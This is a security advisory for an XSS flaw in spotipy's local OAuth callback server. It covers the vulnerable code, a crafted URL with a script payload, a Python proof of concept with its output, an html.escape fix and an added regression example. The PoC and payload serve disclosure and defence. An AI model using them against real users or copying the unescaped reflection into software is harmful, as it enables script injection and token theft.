# CVE-2025-66040

Spotipy has an XSS vulnerability in its OAuth callback server

Source: VulnScope, https://vulnscope.dev/en/cve/CVE-2025-66040 (page metadata lists CVSS 3.6, EPSS 0.00019, KEV: false)

## Description
### Summary

XSS vulnerability in the OAuth callback server allows JavaScript injection through the unsanitized `error` parameter. Attackers can execute arbitrary JavaScript in the user's browser during OAuth authentication.

### Details

**Vulnerable Code:** `spotipy/oauth2.py` lines 1238-1274 (`RequestHandler.do_GET`)

**The Problem:** During the OAuth flow, spotipy starts a local HTTP server to receive callbacks. The server reflects the `error` URL parameter directly into HTML without sanitization.

**Vulnerable code at line 1255:**

```python
status = f"failed ({self.server.error})"
```

**Then embedded in HTML at line 1265:**

```python
self._write(f"""<html>
<body>
<h1>Authentication status: {status}</h1>
</body>
</html>""")
```

The `error` parameter comes from URL parsing (lines 388-393) without HTML escaping, allowing script injection.

**Attack Flow:**

1. User starts OAuth authentication → local server runs on `http://127.0.0.1:8080`
2. Attacker crafts malicious URL: `http://127.0.0.1:8080/?error=<script>alert(1)</script>&state=x`
3. User visits URL → JavaScript executes in localhost origin

### PoC

**Simple Python Test:**

```python
#!/usr/bin/env python3
# poc_xss.py - Demonstrates XSS in spotipy OAuth callback
import threading
import time

import requests
from spotipy.oauth2 import start_local_http_server


# Start vulnerable server in background; it serves a single request and exits
def start_server():
    server = start_local_http_server(8080)
    server.handle_request()


thread = threading.Thread(target=start_server, daemon=True)
thread.start()
time.sleep(2)  # give the server time to bind

# Send XSS payload
payload = '<script>alert("XSS")</script>'
url = f'http://127.0.0.1:8080/?error={payload}&state=test'
response = requests.get(url)

print(f"Status: {response.status_code}")
print(f"\nHTML Response:\n{response.text}")

# Check if vulnerable: the raw payload came back verbatim in the HTML
if payload in response.text:
    print(f"\n[!] VULNERABLE: Payload '{payload}' reflected without escaping!")
else:
    print("\n[+] Safe: Payload was sanitized")
```

**Run it:**

```bash
pip install spotipy requests
python3 poc_xss.py
```

**Output shows:**

```
Status: 200

HTML Response:
<html>
<body>
<h1>Authentication status: failed (<script>alert("XSS")</script>)</h1>
</body>
</html>

[!] VULNERABLE: Payload '<script>alert("XSS")</script>' reflected without escaping!
```

**The Proof:**

- Expected (safe): `&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;`
- Actual (vulnerable): `<script>alert("XSS")</script>`
- The script tags are NOT escaped → XSS confirmed

### Impact

**Vulnerability Type:** Cross-Site Scripting (XSS) - CWE-79

**Affected Users:** Anyone using spotipy's OAuth flow with localhost redirect URIs

**Attack Complexity:** Medium-High

- Requires timing (during brief OAuth window)
- Localhost-only (127.0.0.1)
- Requires user interaction (click malicious link)

**Potential Impact:**

- Execute JavaScript in localhost origin
- Access other localhost services (port scanning, API calls)
- Steal data from local web applications
- Extract OAuth tokens from browser storage
- Bypass CSRF protections on localhost endpoints

**CVSS 3.1 Score:** 4.2 (Medium)

- Attack Vector: Local
- Attack Complexity: High
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Confidentiality/Integrity: Low

**Recommended Fix:**

```python
import html

# Line 1255 - apply HTML escaping
if self.server.error:
    status = f"failed ({html.escape(str(self.server.error))})"
```
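The following is an added example and not spotipy's code or the advisory's PoC. It reproduces the status-page template from the Details section as a plain function with an `escape` switch, so the unescaped rendering and the `html.escape` fix from the Recommended Fix section can be compared side by side, and it wraps the fixed rendering in a minimal `http.server` callback handler bound to an ephemeral 127.0.0.1 port so the advisory's own "is the raw payload reflected?" check can be run offline against a hardened server. The names `render_status_page`, `is_reflected_unescaped`, `CallbackHandler` and `fetch_callback_page`, and the "successful" wording of the no-error branch, are this example's assumptions, not spotipy identifiers.

```python
"""Added example (not spotipy's code): unescaped vs html.escape'd rendering of the
OAuth callback status page, plus a stand-in hardened callback server to check
the fix end to end. All names here are the example's own, not spotipy's."""
import html
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed payload, the same shape as the advisory's PoC input.
PAYLOAD = '<script>alert("XSS")</script>'


def render_status_page(error, escape):
    """Build the status page the advisory describes.

    escape=False reproduces the reflected-input bug: `error` is interpolated
    verbatim into the <h1>. escape=True is the recommended fix: html.escape
    turns <, >, &, " and ' into entities, so a browser shows them as text
    instead of parsing them as markup.
    """
    if error:
        shown = html.escape(str(error)) if escape else str(error)
        status = f"failed ({shown})"
    else:
        status = "successful"  # assumed wording for the no-error branch
    return (
        "<html>\n<body>\n"
        f"<h1>Authentication status: {status}</h1>\n"
        "</body>\n</html>"
    )


def is_reflected_unescaped(payload, body):
    """The advisory's own vulnerability check: raw payload appears verbatim."""
    return payload in body


class CallbackHandler(BaseHTTPRequestHandler):
    """Stand-in for a localhost OAuth callback handler that applies the fix."""

    def do_GET(self):
        query = urllib.parse.urlparse(self.path).query
        params = urllib.parse.parse_qs(query)
        error = params.get("error", [None])[0]
        body = render_status_page(error, escape=True).encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        # keep the example quiet; nothing security-relevant is suppressed
        pass


def fetch_callback_page(error_value):
    """Serve exactly one request on an ephemeral port and return the HTML body.

    Mirrors the PoC's flow (background single-request server, then one GET),
    but lets the OS pick the port and percent-encodes the query value the way
    a browser would.
    """
    server = HTTPServer(("127.0.0.1", 0), CallbackHandler)
    port = server.server_address[1]
    thread = threading.Thread(target=server.handle_request, daemon=True)
    thread.start()
    url = f"http://127.0.0.1:{port}/?error={urllib.parse.quote(error_value)}&state=x"
    with urllib.request.urlopen(url, timeout=5) as resp:
        body = resp.read().decode("utf-8")
    thread.join(timeout=5)
    server.server_close()
    return body


if __name__ == "__main__":
    vulnerable = render_status_page(PAYLOAD, escape=False)
    fixed = render_status_page(PAYLOAD, escape=True)
    print("unescaped template reflects payload:", is_reflected_unescaped(PAYLOAD, vulnerable))
    print("escaped template reflects payload:  ", is_reflected_unescaped(PAYLOAD, fixed))
    print("\nHardened server response:\n" + fetch_callback_page(PAYLOAD))
```

Running the block prints `True` for the unescaped template and `False` for the escaped one, and the hardened server's response carries `&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;` inside the `<h1>`, which is exactly the "Expected (safe)" line of the Proof section. The same `payload in body` test the PoC uses therefore doubles as a regression check once the fix is in place.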